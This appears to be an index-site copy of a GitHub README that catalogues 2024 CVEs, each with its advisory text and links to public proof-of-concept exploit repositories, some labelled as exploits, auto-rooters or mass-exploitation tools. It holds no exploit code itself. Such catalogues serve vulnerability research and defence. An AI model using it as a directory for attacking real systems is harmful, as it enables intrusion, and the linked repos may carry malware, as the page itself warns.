Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/nomi-sec/PoC-in-GitHub
📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
https://github.com/nomi-sec/PoC-in-GitHub
cve exploit poc security vulnerability
Last synced: about 1 month ago
JSON representation
📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
- Host: GitHub
- URL: https://github.com/nomi-sec/PoC-in-GitHub
- Owner: nomi-sec
- Created: 2019-12-08T13:03:54.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2024-10-29T12:31:29.000Z (about 1 month ago)
- Last Synced: 2024-10-29T14:56:43.327Z (about 1 month ago)
- Topics: cve, exploit, poc, security, vulnerability
- Homepage: https://poc-in-github.motikan2010.net
- Size: 520 MB
- Stars: 6,487
- Watchers: 433
- Forks: 1,194
- Open Issues: 14
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- starred - nomi-sec/PoC-in-GitHub - 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware. (Others)
- awesome-rainmana - nomi-sec/PoC-in-GitHub - 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware. (Others)
- WebHackersWeapons - PoC-in-GitHub - sec/PoC-in-GitHub?label=%20)||| (Weapons / Tools)
- awesome-hacking-lists - nomi-sec/PoC-in-GitHub - 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware. (Others)
README
# PoC in GitHub
## 2024
### CVE-2024-0015 (2024-02-16)
In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.
- [UmVfX1BvaW50/CVE-2024-0015](https://github.com/UmVfX1BvaW50/CVE-2024-0015)
### CVE-2024-0023 (2024-02-16)
In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [AbrarKhan/G3_Frameworks_av_CVE-2024-0023](https://github.com/AbrarKhan/G3_Frameworks_av_CVE-2024-0023)
- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0023](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0023)
### CVE-2024-0030 (2024-02-16)
In btif_to_bta_response of btif_gatt_util.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
- [uthrasri/system_bt_CVE-2024-0030](https://github.com/uthrasri/system_bt_CVE-2024-0030)
### CVE-2024-0039 (2024-03-11)
In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.
- [41yn14/CVE-2024-0039-Exploit](https://github.com/41yn14/CVE-2024-0039-Exploit)
### CVE-2024-0040 (2024-02-16)
In setParameter of MtpPacket.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.
- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040)
- [uthrasri/frameworks_av_CVE-2024-0040](https://github.com/uthrasri/frameworks_av_CVE-2024-0040)
### CVE-2024-0044 (2024-03-11)
In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [scs-labrat/android_autorooter](https://github.com/scs-labrat/android_autorooter)
- [pl4int3xt/cve_2024_0044](https://github.com/pl4int3xt/cve_2024_0044)
- [Re13orn/CVE-2024-0044-EXP](https://github.com/Re13orn/CVE-2024-0044-EXP)
- [007CRIPTOGRAFIA/c-CVE-2024-0044](https://github.com/007CRIPTOGRAFIA/c-CVE-2024-0044)
- [Kai2er/CVE-2024-0044-EXP](https://github.com/Kai2er/CVE-2024-0044-EXP)
- [hunter24x24/cve_2024_0044](https://github.com/hunter24x24/cve_2024_0044)
- [nexussecelite/EvilDroid](https://github.com/nexussecelite/EvilDroid)
- [nahid0x1/CVE-2024-0044](https://github.com/nahid0x1/CVE-2024-0044)
- [MrW0l05zyn/cve-2024-0044](https://github.com/MrW0l05zyn/cve-2024-0044)
- [canyie/CVE-2024-0044](https://github.com/canyie/CVE-2024-0044)
### CVE-2024-0049 (2024-03-11)
In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049)
- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0049](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0049)
### CVE-2024-0195 (2024-01-02)
Es wurde eine Schwachstelle in spider-flow 0.4.3 gefunden. Sie wurde als kritisch eingestuft. Es betrifft die Funktion FunctionService.saveFunction der Datei src/main/java/org/spiderflow/controller/FunctionController.java. Durch Manipulieren mit unbekannten Daten kann eine code injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [Cappricio-Securities/CVE-2024-0195](https://github.com/Cappricio-Securities/CVE-2024-0195)
- [fa-rrel/CVE-2024-0195-SpiderFlow](https://github.com/fa-rrel/CVE-2024-0195-SpiderFlow)
- [MuhammadWaseem29/CVE-2024-0195-SpiderFlow](https://github.com/MuhammadWaseem29/CVE-2024-0195-SpiderFlow)
- [hack-with-rohit/CVE-2024-0195-SpiderFlow](https://github.com/hack-with-rohit/CVE-2024-0195-SpiderFlow)
### CVE-2024-0197 (2024-02-27)
A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.\n\n
- [ewilded/CVE-2024-0197-POC](https://github.com/ewilded/CVE-2024-0197-POC)
### CVE-2024-0204 (2024-01-22)
Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
- [horizon3ai/CVE-2024-0204](https://github.com/horizon3ai/CVE-2024-0204)
- [cbeek-r7/CVE-2024-0204](https://github.com/cbeek-r7/CVE-2024-0204)
- [m-cetin/CVE-2024-0204](https://github.com/m-cetin/CVE-2024-0204)
- [adminlove520/CVE-2024-0204](https://github.com/adminlove520/CVE-2024-0204)
### CVE-2024-0230 (2024-01-12)
A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic.
- [keldnorman/cve-2024-0230-blue](https://github.com/keldnorman/cve-2024-0230-blue)
### CVE-2024-0235 (2024-01-16)
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog
- [Cappricio-Securities/CVE-2024-0235](https://github.com/Cappricio-Securities/CVE-2024-0235)
### CVE-2024-0305 (2024-01-08)
Eine Schwachstelle wurde in Guangzhou Yingke Electronic Technology Ncast bis 2017 gefunden. Sie wurde als problematisch eingestuft. Dies betrifft einen unbekannten Teil der Datei /manage/IPSetup.php der Komponente Guest Login. Durch das Manipulieren mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [jidle123/cve-2024-0305exp](https://github.com/jidle123/cve-2024-0305exp)
### CVE-2024-0311 (2024-03-14)
A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code.
- [calligraf0/CVE-2024-0311](https://github.com/calligraf0/CVE-2024-0311)
### CVE-2024-0324 (2024-02-05)
The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.
- [kodaichodai/CVE-2024-0324](https://github.com/kodaichodai/CVE-2024-0324)
### CVE-2024-0352 (2024-01-09)
In Likeshop bis 2.5.7.20210311 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die Funktion FileServer::userFormImage der Datei server/application/api/controller/File.php der Komponente HTTP POST Request Handler. Mit der Manipulation des Arguments file mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
- [Cappricio-Securities/CVE-2024-0352](https://github.com/Cappricio-Securities/CVE-2024-0352)
### CVE-2024-0379 (2024-02-20)
The Custom Twitter Feeds – A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
- [kodaichodai/CVE-2024-0379](https://github.com/kodaichodai/CVE-2024-0379)
### CVE-2024-0399 (2024-04-15)
The WooCommerce Customers Manager WordPress plugin before 29.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.
- [xbz0n/CVE-2024-0399](https://github.com/xbz0n/CVE-2024-0399)
### CVE-2024-0507 (2024-01-16)
An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13 This vulnerability was reported via the GitHub Bug Bounty program.
- [convisolabs/CVE-2024-0507_CVE-2024-0200-github](https://github.com/convisolabs/CVE-2024-0507_CVE-2024-0200-github)
### CVE-2024-0509 (2024-02-05)
The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
- [kodaichodai/CVE-2024-0509](https://github.com/kodaichodai/CVE-2024-0509)
### CVE-2024-0566 (2024-02-12)
The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
- [xbz0n/CVE-2024-0566](https://github.com/xbz0n/CVE-2024-0566)
### CVE-2024-0582 (2024-01-16)
A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.
- [ysanatomic/io_uring_LPE-CVE-2024-0582](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582)
- [Forsaken0129/CVE-2024-0582](https://github.com/Forsaken0129/CVE-2024-0582)
- [0ptyx/cve-2024-0582](https://github.com/0ptyx/cve-2024-0582)
- [geniuszlyy/CVE-2024-0582](https://github.com/geniuszlyy/CVE-2024-0582)
### CVE-2024-0588 (2024-04-09)
The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing nonce validation on the pmpro_lifter_save_streamline_option() function. This makes it possible for unauthenticated attackers to enable the streamline setting with Lifter LMS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
- [kodaichodai/CVE-2024-0588](https://github.com/kodaichodai/CVE-2024-0588)
### CVE-2024-0590 (2024-02-20)
The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
- [kodaichodai/CVE-2024-0590](https://github.com/kodaichodai/CVE-2024-0590)
### CVE-2024-0623 (2024-01-20)
The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
- [kodaichodai/CVE-2024-0623](https://github.com/kodaichodai/CVE-2024-0623)
### CVE-2024-0624 (2024-01-25)
The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
- [kodaichodai/CVE-2024-0624](https://github.com/kodaichodai/CVE-2024-0624)
### CVE-2024-0679 (2024-01-20)
The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.
- [RandomRobbieBF/CVE-2024-0679](https://github.com/RandomRobbieBF/CVE-2024-0679)
### CVE-2024-0684 (2024-02-06)
A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.
- [Valentin-Metz/writeup_split](https://github.com/Valentin-Metz/writeup_split)
### CVE-2024-0710 (2024-05-02)
The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context.
- [karlemilnikka/CVE-2024-0710](https://github.com/karlemilnikka/CVE-2024-0710)
### CVE-2024-0713
- [kitodd/CVE-2024-0713](https://github.com/kitodd/CVE-2024-0713)
### CVE-2024-0741 (2024-01-23)
An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.
- [HyHy100/Firefox-ANGLE-CVE-2024-0741](https://github.com/HyHy100/Firefox-ANGLE-CVE-2024-0741)
### CVE-2024-0757 (2024-06-04)
The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files
- [hunThubSpace/CVE-2024-0757-Exploit](https://github.com/hunThubSpace/CVE-2024-0757-Exploit)
### CVE-2024-0762 (2024-05-14)
Potential buffer overflow \nin unsafe UEFI variable handling \n\nin Phoenix SecureCore™ for select Intel platforms\n\nThis issue affects:\n\nPhoenix \n\nSecureCore™ for Intel Kaby Lake: from 4.0.1.1 before 4.0.1.998;\n\nPhoenix \n\nSecureCore™ for Intel Coffee Lake: from 4.1.0.1 before 4.1.0.562;\n\nPhoenix \n\nSecureCore™ for Intel Ice Lake: from 4.2.0.1 before 4.2.0.323;\n\nPhoenix \n\nSecureCore™ for Intel Comet Lake: from 4.2.1.1 before 4.2.1.287;\n\nPhoenix \n\nSecureCore™ for Intel Tiger Lake: from 4.3.0.1 before 4.3.0.236;\n\nPhoenix \n\nSecureCore™ for Intel Jasper Lake: from 4.3.1.1 before 4.3.1.184;\n\nPhoenix \n\nSecureCore™ for Intel Alder Lake: from 4.4.0.1 before 4.4.0.269;\n\nPhoenix \n\nSecureCore™ for Intel Raptor Lake: from 4.5.0.1 before 4.5.0.218;\n\nPhoenix \n\nSecureCore™ for Intel Meteor Lake: from 4.5.1.1 before 4.5.1.15.\n\n
- [tadash10/Detect-CVE-2024-0762](https://github.com/tadash10/Detect-CVE-2024-0762)
### CVE-2024-0783 (2024-01-22)
Eine kritische Schwachstelle wurde in Project Worlds Online Admission System 1.0 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei documents.php. Durch Manipulieren mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
- [keru6k/Online-Admission-System-RCE-PoC](https://github.com/keru6k/Online-Admission-System-RCE-PoC)
### CVE-2024-0944 (2024-01-26)
Eine problematische Schwachstelle wurde in Totolink T8 4.1.5cu.833_20220905 ausgemacht. Betroffen davon ist ein unbekannter Prozess der Datei /cgi-bin/cstecgi.cgi. Mit der Manipulation mit unbekannten Daten kann eine session expiration-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Die Komplexität eines Angriffs ist eher hoch. Sie ist schwierig ausnutzbar. Der Exploit steht zur öffentlichen Verfügung.
- [Artemisxxx37/cve-2024-0944](https://github.com/Artemisxxx37/cve-2024-0944)
### CVE-2024-0986 (2024-01-28)
Eine Schwachstelle wurde in Issabel PBX 4.0.0 ausgemacht. Sie wurde als kritisch eingestuft. Es geht hierbei um eine nicht näher spezifizierte Funktion der Datei /index.php?menu=asterisk_cli der Komponente Asterisk-Cli. Durch Beeinflussen des Arguments Command mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung.
- [gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated](https://github.com/gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated)
### CVE-2024-1071 (2024-03-13)
The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [gbrsh/CVE-2024-1071](https://github.com/gbrsh/CVE-2024-1071)
- [Trackflaw/CVE-2024-1071-Docker](https://github.com/Trackflaw/CVE-2024-1071-Docker)
- [Matrexdz/CVE-2024-1071](https://github.com/Matrexdz/CVE-2024-1071)
- [Matrexdz/CVE-2024-1071-Docker](https://github.com/Matrexdz/CVE-2024-1071-Docker)
- [fa-rrel/CVE-2024-1071-SQL-Injection](https://github.com/fa-rrel/CVE-2024-1071-SQL-Injection)
- [Dogu589/WordPress-Exploit-CVE-2024-1071](https://github.com/Dogu589/WordPress-Exploit-CVE-2024-1071)
### CVE-2024-1086 (2024-01-31)
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n
- [Notselwyn/CVE-2024-1086](https://github.com/Notselwyn/CVE-2024-1086)
- [Alicey0719/docker-POC_CVE-2024-1086](https://github.com/Alicey0719/docker-POC_CVE-2024-1086)
- [CCIEVoice2009/CVE-2024-1086](https://github.com/CCIEVoice2009/CVE-2024-1086)
- [kevcooper/CVE-2024-1086-checker](https://github.com/kevcooper/CVE-2024-1086-checker)
- [feely666/CVE-2024-1086](https://github.com/feely666/CVE-2024-1086)
- [xzx482/CVE-2024-1086](https://github.com/xzx482/CVE-2024-1086)
- [matrixvk/CVE-2024-1086-aarch64](https://github.com/matrixvk/CVE-2024-1086-aarch64)
### CVE-2024-1112 (2024-01-31)
Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument.
- [enessakircolak/CVE-2024-1112](https://github.com/enessakircolak/CVE-2024-1112)
### CVE-2024-1207 (2024-02-08)
The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [sahar042/CVE-2024-1207](https://github.com/sahar042/CVE-2024-1207)
### CVE-2024-1208 (2024-02-05)
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
- [karlemilnikka/CVE-2024-1208-and-CVE-2024-1210](https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210)
- [Cappricio-Securities/CVE-2024-1208](https://github.com/Cappricio-Securities/CVE-2024-1208)
### CVE-2024-1209 (2024-02-05)
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.
- [karlemilnikka/CVE-2024-1209](https://github.com/karlemilnikka/CVE-2024-1209)
### CVE-2024-1212 (2024-02-21)
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n\n\n
- [Chocapikk/CVE-2024-1212](https://github.com/Chocapikk/CVE-2024-1212)
- [nak000/CVE-2024-1212](https://github.com/nak000/CVE-2024-1212)
### CVE-2024-1269 (2024-02-07)
In SourceCodester Product Management System 1.0 wurde eine problematische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei /supplier.php. Dank Manipulation des Arguments supplier_name/supplier_contact mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
- [sajaljat/CVE-2024-1269](https://github.com/sajaljat/CVE-2024-1269)
### CVE-2024-1301 (2024-03-12)
SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database.
- [guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection](https://github.com/guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection)
### CVE-2024-1302 (2024-03-12)
Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file obtaining all sensitive information such as database credentials.
- [guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure](https://github.com/guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure)
### CVE-2024-1303 (2024-03-12)
Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows an authenticated attacker to retrieve any file from the device using the download-file functionality.
- [guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal](https://github.com/guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal)
### CVE-2024-1304 (2024-03-12)
Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted javascript payload to an authenticated user and partially hijack their browser session.
- [guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS](https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS)
### CVE-2024-1346 (2024-02-19)
Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.
- [PeterGabaldon/CVE-2024-1346](https://github.com/PeterGabaldon/CVE-2024-1346)
### CVE-2024-1380 (2024-03-13)
The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is.
- [RandomRobbieBF/CVE-2024-1380](https://github.com/RandomRobbieBF/CVE-2024-1380)
### CVE-2024-1403 (2024-02-27)
In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified. The\nvulnerability is a bypass to authentication based on a failure to properly\nhandle username and password. Certain unexpected\ncontent passed into the credentials can lead to unauthorized access without proper\nauthentication. \n\n\n\n\n\n\n
- [horizon3ai/CVE-2024-1403](https://github.com/horizon3ai/CVE-2024-1403)
### CVE-2024-1441 (2024-03-11)
An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.
- [almkuznetsov/CVE-2024-1441](https://github.com/almkuznetsov/CVE-2024-1441)
### CVE-2024-1512 (2024-02-17)
The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [rat-c/CVE-2024-1512](https://github.com/rat-c/CVE-2024-1512)
### CVE-2024-1561 (2024-04-16)
An issue was discovered in gradio-app/gradio, where the `/component_server` endpoint improperly allows the invocation of any method on a `Component` class with attacker-controlled arguments. Specifically, by exploiting the `move_resource_to_block_cache()` method of the `Block` class, an attacker can copy any file on the filesystem to a temporary directory and subsequently retrieve it. This vulnerability enables unauthorized local file read access, posing a significant risk especially when the application is exposed to the internet via `launch(share=True)`, thereby allowing remote attackers to read files on the host machine. Furthermore, gradio apps hosted on `huggingface.co` are also affected, potentially leading to the exposure of sensitive information such as API keys and credentials stored in environment variables.
- [DiabloHTB/CVE-2024-1561](https://github.com/DiabloHTB/CVE-2024-1561)
- [DiabloHTB/Nuclei-Template-CVE-2024-1561](https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561)
### CVE-2024-1651 (2024-02-19)
Torrentpier version 2.4.1 allows executing arbitrary commands on the server.\n\nThis is possible because the application is vulnerable to insecure deserialization.\n\n\n\n\n
- [sharpicx/CVE-2024-1651-PoC](https://github.com/sharpicx/CVE-2024-1651-PoC)
- [hy011121/CVE-2024-1651-exploit-RCE](https://github.com/hy011121/CVE-2024-1651-exploit-RCE)
- [Whiteh4tWolf/CVE-2024-1651-PoC](https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC)
### CVE-2024-1655 (2024-04-15)
Certain ASUS WiFi routers models has an OS Command Injection vulnerability, allowing an authenticated remote attacker to execute arbitrary system commands by sending a specially crafted request.
- [lnversed/CVE-2024-1655](https://github.com/lnversed/CVE-2024-1655)
### CVE-2024-1698 (2024-02-27)
The NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
- [kamranhasan/CVE-2024-1698-Exploit](https://github.com/kamranhasan/CVE-2024-1698-Exploit)
- [shanglyu/CVE-2024-1698](https://github.com/shanglyu/CVE-2024-1698)
### CVE-2024-1709 (2024-02-21)
ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel\n\n vulnerability, which may allow an attacker direct access to confidential information or \n\ncritical systems.\n\n
- [W01fh4cker/ScreenConnect-AuthBypass-RCE](https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE)
- [HussainFathy/CVE-2024-1709](https://github.com/HussainFathy/CVE-2024-1709)
- [sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass](https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass)
- [cjybao/CVE-2024-1709-and-CVE-2024-1708](https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708)
- [AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-](https://github.com/AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-)
- [AMRICHASFUCK/Mass-CVE-2024-1709](https://github.com/AMRICHASFUCK/Mass-CVE-2024-1709)
### CVE-2024-1781 (2024-02-23)
Eine Schwachstelle wurde in Totolink X6000R AX3000 9.4.0cu.852_20230719 ausgemacht. Sie wurde als kritisch eingestuft. Betroffen davon ist die Funktion setWizardCfg der Datei /cgi-bin/cstecgi.cgi der Komponente shttpd. Dank der Manipulation mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung.
- [Icycu123/CVE-2024-1781](https://github.com/Icycu123/CVE-2024-1781)
### CVE-2024-1874 (2024-04-29)
In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell. \n\n
- [ox1111/-CVE-2024-1874-](https://github.com/ox1111/-CVE-2024-1874-)
- [Tgcohce/CVE-2024-1874](https://github.com/Tgcohce/CVE-2024-1874)
### CVE-2024-1931 (2024-03-07)
